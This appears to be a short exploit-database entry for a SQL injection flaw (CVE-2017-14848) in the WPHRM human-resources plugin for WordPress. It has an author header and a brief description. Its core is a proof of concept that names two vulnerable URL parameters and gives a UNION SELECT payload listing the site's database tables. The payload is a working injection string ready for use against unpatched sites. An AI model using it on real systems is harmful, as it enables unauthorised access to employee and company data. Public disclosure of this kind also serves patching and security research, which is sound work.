29 lines
No EOL
999 B
Text
29 lines
No EOL
999 B
Text
# # # # #
|
|
# Exploit Title: WordPress Plugin WPHRM - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 29.09.2017
|
|
# Vendor Homepage: http://mojoomla.com/
|
|
# Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857
|
|
# Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/
|
|
# Version: N/A
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: CVE-2017-14848
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an employee users to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
|
|
#
|
|
# -23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-
|
|
#
|
|
# http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
|
|
#
|
|
# Etc..
|
|
# # # # # |